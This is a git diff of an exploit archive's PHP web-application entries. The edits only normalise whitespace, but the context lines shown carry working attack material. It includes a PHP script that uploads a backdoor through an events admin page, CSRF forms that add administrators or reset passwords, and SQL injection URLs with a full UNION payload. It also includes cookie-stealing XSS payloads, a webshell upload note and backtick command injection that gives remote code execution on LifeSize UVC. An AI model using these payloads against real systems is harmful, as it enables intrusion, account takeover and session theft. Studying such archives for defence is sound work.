         <tr>
           <td width="50%"><table width="100%" height="170" border="0" cellpadding="0" cellspacing="1" bordercolor="#CCCCCC" class="proborder">
             <tr>
-              <td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
+              <td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
 
 [/code]
 
diff --git a/exploits/php/webapps/17562.php b/exploits/php/webapps/17562.php
index 623510d9b..6001f2574 100644
--- a/exploits/php/webapps/17562.php
+++ b/exploits/php/webapps/17562.php
@@ -103,7 +103,7 @@ $post_bd = array(
     "description"=>"bla bla bla ,,,","cat"=> 1,
     "day"=> 22,"month"=> 11,"year"=>2011,
     "picture"=>"@".realpath("dz.php"),
-    "submit"=>"  Update Event  ");
+    "submit"=>"  Update Event  ");
 
 # post backdoor & check
 echo (!eregi("<strong>Errors</strong>", DzCURL($target."admin_events.php",$post_bd,$header))) ? "# Backdoor uploaded :D\n":die("# Failed : can't upload Backdoor");
diff --git a/exploits/php/webapps/18236.txt b/exploits/php/webapps/18236.txt
index fc95ba331..04623e6f5 100644
--- a/exploits/php/webapps/18236.txt
+++ b/exploits/php/webapps/18236.txt
@@ -1,11 +1,11 @@
 # Exploit Title: Pixie v1.04 blog post CSRF
-# Google Dork: # Date: 11-Dec-2011
+# Google Dork: # Date: 11-Dec-2011
 # Author: hackme
-# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
+# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
 # Version: 1.04# Tested on: Linux Ubuntu 10.10
 # CVE :
 [+] TH4NKZ T0: broiosen,ReGun and hackgame.it
-[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
+[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
 [+] Post Method
 [+] exploit:
 
diff --git a/exploits/php/webapps/18466.txt b/exploits/php/webapps/18466.txt
index 7ee1ea560..01b89bde3 100644
--- a/exploits/php/webapps/18466.txt
+++ b/exploits/php/webapps/18466.txt
@@ -7,15 +7,15 @@
 # http://www.tubeace.com
 # Tested on: Linux
 # Dork: "?viewStandard=0"
-  
+  
 [Comment]
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
 Maximiliano Soler
-    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
+    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion
-    her0, r0dr1 y demas user de RemoteExecution 
-    www.remoteexecution.info www.remoteexcution.com.ar 
-    #RemoteExecution Hacking Group
+    her0, r0dr1 y demas user de RemoteExecution 
+    www.remoteexecution.info www.remoteexcution.com.ar 
+    #RemoteExecution Hacking Group
 
 [PoC]
 
diff --git a/exploits/php/webapps/18495.html b/exploits/php/webapps/18495.html
index a0ff0406e..dd332474d 100644
--- a/exploits/php/webapps/18495.html
+++ b/exploits/php/webapps/18495.html
@@ -11,7 +11,7 @@
 
 <center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ]
 <span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff">
-</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
+</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
 <font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p>
 <p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL 
 KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center>
diff --git a/exploits/php/webapps/18711.txt b/exploits/php/webapps/18711.txt
index ad63dec52..6826192c1 100644
--- a/exploits/php/webapps/18711.txt
+++ b/exploits/php/webapps/18711.txt
@@ -77,7 +77,7 @@ setTimeout('document.test.submit()',0);
     <input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
   </p>
   <p><input type="submit" name="Change" value="Change" />
-   </p>
+   </p>
 </form>
 </body>
 </html>
diff --git a/exploits/php/webapps/18742.php b/exploits/php/webapps/18742.php
index 873397a19..96a1a8d97 100644
--- a/exploits/php/webapps/18742.php
+++ b/exploits/php/webapps/18742.php
@@ -113,7 +113,7 @@ Greets : Sho0ter  , Net_spy , khanisgr8 , CROSS & All Hackw0rms Crew / Members
    <!-- buttons start -->
    <table width="100%" cellpadding="5" border="0">
    		<tr>
-   			<td width="80"> </td>
+   			<td width="80"> </td>
 			<td align="right">
    				<input type="submit" name="Save" value="Save" style="width:80px;">
 			</td>
diff --git a/exploits/php/webapps/18743.txt b/exploits/php/webapps/18743.txt
index 2e00ef558..42c2aa21e 100644
--- a/exploits/php/webapps/18743.txt
+++ b/exploits/php/webapps/18743.txt
@@ -7,23 +7,23 @@
 # http://www.mediaxxxscript.com/
 # Tested on: Linux
 # Dork: "Powered by MediaXxx Mobile"
-   
+   
 [Comment]
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
 Maximiliano Soler
-    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
+    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion,ksha,zerial,
-    her0, r0dr1 y demas user de RemoteExecution
-    wwwremoteexecution.info www.remoteexcution.com.ar
-    #RemoteExecution Hacking Group
- 
+    her0, r0dr1 y demas user de RemoteExecution
+    wwwremoteexecution.info www.remoteexcution.com.ar
+    #RemoteExecution Hacking Group
+ 
 [PoC]
- 
+ 
 http://localhost/mobile/search?query=[SQL Injection]
- 
- 
+ 
+ 
 [DEMO]
- 
+ 
 http://server/mobile/search?query=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C122%2C108%2C118%2C58%29%2C%28CASE%20WHEN%20%28EXISTS%28SELECT%209%20FROM%20information_schema.TABLES%29%29%20THEN%201%20ELSE%200%20END%29%2CCHAR%2858%2C113%2C103%2C116%2C58%29%29%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTgy%27%3D%27CTgy
 
 -------------------------
diff --git a/exploits/php/webapps/18900.txt b/exploits/php/webapps/18900.txt
index de3d5e797..bbd5c8d6d 100644
--- a/exploits/php/webapps/18900.txt
+++ b/exploits/php/webapps/18900.txt
@@ -102,15 +102,15 @@ Content-Type: text/html
          </tr> <tr><td>Comment:</td><td>
 <input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
 </td><td>Last IP:NONE<br></td>
-<tr><td> </td><td></td></tr>
-          <tr><td> </td><td>
-          <input type="submit" name="action" class="bluebox" value="Update" /> 
+<tr><td> </td><td></td></tr>
+          <tr><td> </td><td>
+          <input type="submit" name="action" class="bluebox" value="Update" /> 
           <input type="submit" name="action" class="bluebox" value="Delete" 
             onClick="javascript:return confirm('Really DELETE this end-device record?')"
             />
-          </td></tr>'<tr><td> </td><td></td></tr>
-<tr><td> </td><td></td></tr>
-</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
+          </td></tr>'<tr><td> </td><td></td></tr>
+<tr><td> </td><td></td></tr>
+</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
 <tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
 <tr><td>Classification:
 
diff --git a/exploits/php/webapps/19549.txt b/exploits/php/webapps/19549.txt
index c82ed0e9b..1246bdfec 100644
--- a/exploits/php/webapps/19549.txt
+++ b/exploits/php/webapps/19549.txt
@@ -18,11 +18,11 @@ Project CHAP Security
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
 Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion, ksha, zerial,LinuxFer, Scorp
-    her0, r0dr1 y demas user de RemoteExecution
-    www.remoteexecution.info www.remoteexcution.com.ar
-    #RemoteExecution Hacking Group
+    her0, r0dr1 y demas user de RemoteExecution
+    www.remoteexecution.info www.remoteexcution.com.ar
+    #RemoteExecution Hacking Group
 
- 
+ 
 [PoC]
 
 http://localhost/classified-listing.php?catId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
diff --git a/exploits/php/webapps/20055.txt b/exploits/php/webapps/20055.txt
index 9484b5430..705f83e13 100644
--- a/exploits/php/webapps/20055.txt
+++ b/exploits/php/webapps/20055.txt
@@ -8,15 +8,15 @@ Date: 23/07/2012
 # www.chap.cl
 # Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
 # be secured /stay secure
-# contacto@chap.cl 
+# contacto@chap.cl 
 
 [Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
-Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp    her0, r0dr1 y demas user de RemoteExecution   
-www.remoteexecution.info www.remoteexcution.com.ar   
-#RemoteExecution Hacking Group   
+Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp    her0, r0dr1 y demas user de RemoteExecution   
+www.remoteexecution.info www.remoteexcution.com.ar   
+#RemoteExecution Hacking Group   
 
 [PoC]
-find Squid's access.log file path and insert "> Example: ">PWNED!
+find Squid's access.log file path and insert "> Example: ">PWNED!
 
 http://server/mysar/www/?a=administration
 
diff --git a/exploits/php/webapps/20671.html b/exploits/php/webapps/20671.html
index 7025a250d..0cc17afbc 100644
--- a/exploits/php/webapps/20671.html
+++ b/exploits/php/webapps/20671.html
@@ -9,5 +9,5 @@
  
  <form method="POST" action="http://server/admin/admin_settings.php" enctype="multipart/form-data">
  <input type="hidden" name="sel" value="save_admin_pass"><table cellpadding="3" cellspacing="0"><tr><td width="150"><font class="main_header_text">New Password:</font></td><td><input type="password" name="new_pass" value="" style="width: 200px;"></td></tr><tr><td>
- <font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
+ <font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
  <input type="submit" value="Save"></td></tr></table></form></div>
\ No newline at end of file
diff --git a/exploits/php/webapps/24953.txt b/exploits/php/webapps/24953.txt
index e627ee126..b82e36172 100644
--- a/exploits/php/webapps/24953.txt
+++ b/exploits/php/webapps/24953.txt
@@ -39,14 +39,14 @@ Vulnerable page : http://target.com/[path]/admin/file_io.php
 			<td width="300" height="50" align="center" valign="middle">
 			<font color="#808080">New Username:</font>
 			</td>
-			<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
+			<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
 		</tr>
 
 			</td>
 		<tr>
 			<td width="300" height="62" align="center" valign="middle">
 			<font color="#808080">New Password: </font> </td>
-			<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
+			<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
 		</tr>
 		<tr>
 			<td height="50" colspan="2" align="center" valign="middle" ><p>
diff --git a/exploits/php/webapps/25245.txt b/exploits/php/webapps/25245.txt
index d36958503..b3ece2944 100644
--- a/exploits/php/webapps/25245.txt
+++ b/exploits/php/webapps/25245.txt
@@ -77,7 +77,7 @@ type="password" value="abdotv"/></td>
                                   </tr>
 
                                   <tr>
-                                    <td valign="top"> </td>
+                                    <td valign="top"> </td>
                                     <td><table  border="0" cellspacing="0"
 cellpadding="2">
                                         <tr>
@@ -86,7 +86,7 @@ cellpadding="2">
                                           <input type="submit"
 value="Submit" name="btn_submit" >
  </td>
-                                          <td width="6"> </td>
+                                          <td width="6"> </td>
                                         </tr>
                                       </table></td>
                                   </tr>
@@ -109,7 +109,7 @@ value="Submit" name="btn_submit" >
         <td width="3%" align="left" background="images/layoutadmin_109.jpg"
 style="background-repeat:repeat-x" ><img src="images/layoutadmin_108.jpg"
 width="33" height="20" alt="" /></td>
-        <td   background="images/layoutadmin_109.jpg"> </td>
+        <td   background="images/layoutadmin_109.jpg"> </td>
         <td width="3%" align="right"
 background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
 ><img src="images/layoutadmin_111.jpg" width="33"  height="20" alt=""/></td>
diff --git a/exploits/php/webapps/26366.txt b/exploits/php/webapps/26366.txt
index 79373e8bf..f5d2ecfee 100644
--- a/exploits/php/webapps/26366.txt
+++ b/exploits/php/webapps/26366.txt
@@ -59,9 +59,9 @@ Error: You have an error in your SQL syntax; check the manual that corresponds t
 AND `glpi_tickets`.`is_deleted` = 0
 ' at line 3
 Backtrace :
-/var/www/html/glpi/inc/db.function.php :288		DBmysql->query()
-/var/www/html/glpi/inc/commonitilobject.class.php :362		countElementsInTable()
-/var/www/html/glpi/ajax/ticketassigninformation.php :66		CommonITILObject->countActiveObjectsForTech()
+/var/www/html/glpi/inc/db.function.php :288		DBmysql->query()
+/var/www/html/glpi/inc/commonitilobject.class.php :362		countElementsInTable()
+/var/www/html/glpi/ajax/ticketassigninformation.php :66		CommonITILObject->countActiveObjectsForTech()
 /var/www/html/glpi/ajax/ticketassigninformation.php
 
 
@@ -98,11 +98,11 @@ WHERE `ext` LIKE \'1\'\'
 AND `is_uploadable`=\'1\'
 Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3
 Backtrace :
-/var/www/html/glpi/inc/document.class.php :1232		DBmysql->query()
-/var/www/html/glpi/inc/document.class.php :1088		Document::isValidDoc()
-/var/www/html/glpi/inc/document.class.php :275		Document::uploadDocument()
-/var/www/html/glpi/inc/commondbtm.class.php :878		Document->prepareInputForUpdate()
-/var/www/html/glpi/front/document.form.php :99		CommonDBTM->update()
+/var/www/html/glpi/inc/document.class.php :1232		DBmysql->query()
+/var/www/html/glpi/inc/document.class.php :1088		Document::isValidDoc()
+/var/www/html/glpi/inc/document.class.php :275		Document::uploadDocument()
+/var/www/html/glpi/inc/commondbtm.class.php :878		Document->prepareInputForUpdate()
+/var/www/html/glpi/front/document.form.php :99		CommonDBTM->update()
 /var/www/html/glpi/front/document.form.php
 
 
@@ -121,9 +121,9 @@ Backtrace :
 SQL: SHOW TABLES LIKE \'%glpi_users\'%\'
 Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
 Backtrace :
-/var/www/html/glpi/glpi/inc\dbmysql.class.php :365		DBmysql->query()
-/var/www/html/glpi/inc/db.function.php :1182		DBmysql->list_tables()
-/var/www/html/glpi/ajax/comments.php :47		TableExists()
+/var/www/html/glpi/glpi/inc\dbmysql.class.php :365		DBmysql->query()
+/var/www/html/glpi/inc/db.function.php :1182		DBmysql->list_tables()
+/var/www/html/glpi/ajax/comments.php :47		TableExists()
 /var/www/html/glpi/ajax/comments.php
 
 ======================================================================
diff --git a/exploits/php/webapps/28668.txt b/exploits/php/webapps/28668.txt
index 6310043e3..d9ec0c2f3 100644
--- a/exploits/php/webapps/28668.txt
+++ b/exploits/php/webapps/28668.txt
@@ -1,9 +1,9 @@
 source: https://www.securityfocus.com/bid/20202/info
- 
+ 
 BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
- 
+ 
 An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
- 
+ 
 BirdBlog 1.4.0 and prior versions are reported vulnerable.
 
 http://www.example.com/[path]/index.php?page=<Script>
\ No newline at end of file
diff --git a/exploits/php/webapps/29000.txt b/exploits/php/webapps/29000.txt
index 22505efc2..80cae78af 100644
--- a/exploits/php/webapps/29000.txt
+++ b/exploits/php/webapps/29000.txt
@@ -1,9 +1,9 @@
 source: https://www.securityfocus.com/bid/21049/info
- 
+ 
 DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
- 
+ 
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
- 
+ 
 Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
 
 http://www.example.com:2222/CMD_SHOW_USER?user=XSS
\ No newline at end of file
diff --git a/exploits/php/webapps/29790.txt b/exploits/php/webapps/29790.txt
index 23c990b3e..f4aded1bb 100644
--- a/exploits/php/webapps/29790.txt
+++ b/exploits/php/webapps/29790.txt
@@ -56,6 +56,6 @@ style=" ">
         <div class="right">
             <span class="currentPage">"><img src=x
 onerror=prompt(document.cookie);> </span>
-            <a href="#" class="topmenuToggle"> </a>
+            <a href="#" class="topmenuToggle"> </a>
             <div class="topmenu">
                         <ul class="level1">
\ No newline at end of file
diff --git a/exploits/php/webapps/30107.txt b/exploits/php/webapps/30107.txt
index 979deab50..5e516566e 100644
--- a/exploits/php/webapps/30107.txt
+++ b/exploits/php/webapps/30107.txt
@@ -112,7 +112,7 @@ http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
 <a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x
 onerror=prompt(1);>" title="Home"><img
 src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"
-/></a> 
+/></a> 
 <!-- Script OVML: show the list of the buttons of quick accesses to
 functions by leaning on entries available in user section -->
 
diff --git a/exploits/php/webapps/31517.txt b/exploits/php/webapps/31517.txt
index a8164d9f3..754e17353 100644
--- a/exploits/php/webapps/31517.txt
+++ b/exploits/php/webapps/31517.txt
@@ -1,21 +1,21 @@
 # Exploit Title: [CTERA Project Folders -  Stored XSS]
- 
+ 
 # Date: [11-Mar-2013]
 # Exploit Author: [Luigi Vezzoso]
 # Vendor Homepage: [http://www.ctera.com]
 # Version: [3.2.29.0 and 3.2.42.0 ]
 # Tested on: [ctera os]
 # CVE : [CVE-2013-2639]
- 
+ 
 #OVERVIEW
 Standard Ctera User can define a particular “description” for a ProjectFolder that cause javascript code execution and HTML injection. 
- 
+ 
 #INTRODUCTION
-CTERA Networks (http://www.ctera.com)bridges the gap between cloud storage and local storage, providing optimized performance and end-to-end security. Our solutions accelerate deployment of cloud services and eliminate the costs associated with file servers, backup servers and tape drives. Service providers and enterprises use CTERA to deliver services such as backup, file sync and share, mobile collaboration, managed NAS and cloud on-ramping, based on the cloud infrastructure of their choice.
- 
+CTERA Networks (http://www.ctera.com)bridges the gap between cloud storage and local storage, providing optimized performance and end-to-end security. Our solutions accelerate deployment of cloud services and eliminate the costs associated with file servers, backup servers and tape drives. Service providers and enterprises use CTERA to deliver services such as backup, file sync and share, mobile collaboration, managed NAS and cloud on-ramping, based on the cloud infrastructure of their choice.
+ 
 #VULNERABILITY DESCRIPTION
 User can forge particular description on Project Folder that permit XSS, HTML Injection (add of link, images, button ecc). As the project folder can be shared with different users that vulnerability permit the grabbing of sessions cookies.
- 
+ 
 For test the vuln: Create a Project Folder with the following description (the particular path depend of firmware version)
 
 </xml><img src="https://192.168.3.2/admingui/common.3.2.29.291012114828/script/ext/resources/images/default/grid/loading.gif" onload="alert(document.cookie);">
@@ -25,11 +25,11 @@ For test the vuln: Create a Project Folder with the following description (the p
 
 #VERSIONS AFFECTED
 Tested on CTERA Cloud Storage OS version 3.2.29.0 and 3.2.42.0 
- 
+ 
 #SOLUTION
 The vendor mark as resolved on latest CTERA version 4.x
- 
+ 
 #CREDITS
 Luigi Vezzoso 
-email:  luigivezzoso@gmail.com
-skype:  luigivezzoso
\ No newline at end of file
+email:  luigivezzoso@gmail.com
+skype:  luigivezzoso
\ No newline at end of file
diff --git a/exploits/php/webapps/31570.txt b/exploits/php/webapps/31570.txt
index ba8481181..003370906 100644
--- a/exploits/php/webapps/31570.txt
+++ b/exploits/php/webapps/31570.txt
@@ -10,7 +10,7 @@
 
 [PoC]
 
-you can upload files with php extension. Example: c99.php, shell.gif.php, etc...
+you can upload files with php extension. Example: c99.php, shell.gif.php, etc...
 
 http://localhost/wp-content/uploads/feuGT_uploads/feuGT_1790_43000000_948109840.php
 
diff --git a/exploits/php/webapps/32437.txt b/exploits/php/webapps/32437.txt
index 9e48aa4be..664d409f8 100644
--- a/exploits/php/webapps/32437.txt
+++ b/exploits/php/webapps/32437.txt
@@ -1,7 +1,7 @@
 LifeSize UVC 1.2.6 authenticated vulnerabilities
- 
+ 
 RCE as www-data:
- 
+ 
 POST /server-admin/operations/diagnose/ping/ HTTP/1.1
 Host: 172.31.16.99
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
@@ -13,18 +13,18 @@ Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 118
- 
+ 
 csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
- 
+ 
 The above POST results in a response containing:
 <span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
- 
- 
- 
- 
- 
+ 
+ 
+ 
+ 
+ 
 RCE as www-data:
- 
+ 
 POST /server-admin/operations/diagnose/trace/ HTTP/1.1
 Host: 172.31.16.99
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
@@ -36,19 +36,19 @@ Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 101
- 
+ 
 csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
- 
+ 
 Results in the following error:
 gowww-dataogle.com: Name or service not known
- 
- 
- 
- 
- 
- 
+ 
+ 
+ 
+ 
+ 
+ 
 RCE as www-data:
- 
+ 
 POST /server-admin/operations/diagnose/dns/ HTTP/1.1
 Host: 172.31.16.99
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
@@ -60,22 +60,22 @@ Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 116
- 
+ 
 csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
- 
+ 
 Results in the following results:
 ; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
 ;; global options: +cmd
 ;; Got answer:
 ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
- 
+ 
 ;; QUESTION SECTION:
 ;gowww-dataogle.com. IN ANY
- 
+ 
 ;; AUTHORITY SECTION:
 com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
- 
+ 
 ;; Query time: 21 msec
 ;; SERVER: 8.8.8.8#53(8.8.8.8)
 ;; WHEN: Fri Mar 21 10:26:21 2014
diff --git a/exploits/php/webapps/33714.txt b/exploits/php/webapps/33714.txt
index f8f864b02..15eb4e2ea 100644
--- a/exploits/php/webapps/33714.txt
+++ b/exploits/php/webapps/33714.txt
@@ -1,15 +1,15 @@
-# Exploit Title: SHOUTcast DNAS v2.2.1 win32 XSS\HTML Injection in Song history  (other version may be also affected)
-# Date: 2014-06-11 
+# Exploit Title: SHOUTcast DNAS v2.2.1 win32 XSS\HTML Injection in Song history  (other version may be also affected)
+# Date: 2014-06-11 
 # Exploit Author: robercik101
-# Vendor Homepage: http://www.shoutcast.com/ ?t=373139
-# Software Link: http://forums.winamp.com/showthread.php?t=373139
+# Vendor Homepage: http://www.shoutcast.com/ ?t=373139
+# Software Link: http://forums.winamp.com/showthread.php?t=373139
 # Version: 2.2.1 for Win32
 # Tested on: Windows 8.1
 There is an XSS\HTML Injection in a song history in song history, allowing inject a JavaScript script or HTML code in site.
 PoC:
-1. Open yours MP3 file setting, and open details overlap.
+1. Open yours MP3 file setting, and open details overlap.
 2. In the title field enter your HTML code
-3. Start streaming your MP3 file via Winamp with SHOUTcast Source DSP 
+3. Start streaming your MP3 file via Winamp with SHOUTcast Source DSP 
 4. Open your SHOUTcast page (default: localhost:8000) in your favourite Internet browser, login to server (if it needed) and open Song history.
 And it is all
 http://robercik101.tk
\ No newline at end of file
diff --git a/exploits/php/webapps/35541.txt b/exploits/php/webapps/35541.txt
index de6e7247e..5c9877e65 100644
--- a/exploits/php/webapps/35541.txt
+++ b/exploits/php/webapps/35541.txt
@@ -226,14 +226,14 @@ The 'sort' parameter of the /pages/preview.php CGI :
 (extended patterns) :
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=&sort
-=504 onerror="alert(504);&archive=&k=">< Back to resource view</
+=504 onerror="alert(504);&archive=&k=">< Back to resource view</
 a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 /pages/preview.php?sort=&sort=504%20onerror="alert(504);
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=&sort
-=504 onerror="alert(504);&archive=&k=">< Back to resource view</
+=504 onerror="alert(504);&archive=&k=">< Back to resource view</
 a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 + The 'order_by' parameter of the /pages/preview.php CGI :
@@ -241,14 +241,14 @@ a>
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=504 o
-nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
+nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
 ew</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 /pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=504 o
-nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
+nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
 ew</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 + The 'sort' parameter of the /pages/preview.php CGI :
@@ -257,7 +257,7 @@ m=
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=&sort
-=504 onerror="alert(504);&archive=&k=">< Back to resource view</
+=504 onerror="alert(504);&archive=&k=">< Back to resource view</
 a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 /pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_b
@@ -265,7 +265,7 @@ y=&from=
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=&sort
-=504 onerror="alert(504);&archive=&k=">< Back to resource view</
+=504 onerror="alert(504);&archive=&k=">< Back to resource view</
 a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 + The 'order_by' parameter of the /pages/preview.php CGI :
@@ -274,7 +274,7 @@ m=
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=504 o
-nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
+nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
 Tonbridge & Malling Borough Council
  Vulnerabilities Report | 5
 a>
@@ -284,7 +284,7 @@ a>
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=504 o
-nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
+nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
 a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 Clicking directly on these URLs should exhibit the issue :
@@ -353,28 +353,28 @@ Using the GET HTTP method, Nessus found that :
 a
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=&sort
-=<"jfunqd >&archive=&k=">< Back to resource view</a>
+=<"jfunqd >&archive=&k=">< Back to resource view</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 + The 'order_by' parameter of the /pages/preview.php CGI :
 /pages/preview.php?order_by=<"jfunqd%20>
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=<"jfu
-nqd >&sort=DESC&archive=&k=">< Back to resource view</a>
+nqd >&sort=DESC&archive=&k=">< Back to resource view</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 + The 'sort' parameter of the /pages/preview.php CGI :
 /pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=&sort
-=<"jfunqd >&archive=&k=">< Back to resource view</a>
+=<"jfunqd >&archive=&k=">< Back to resource view</a>
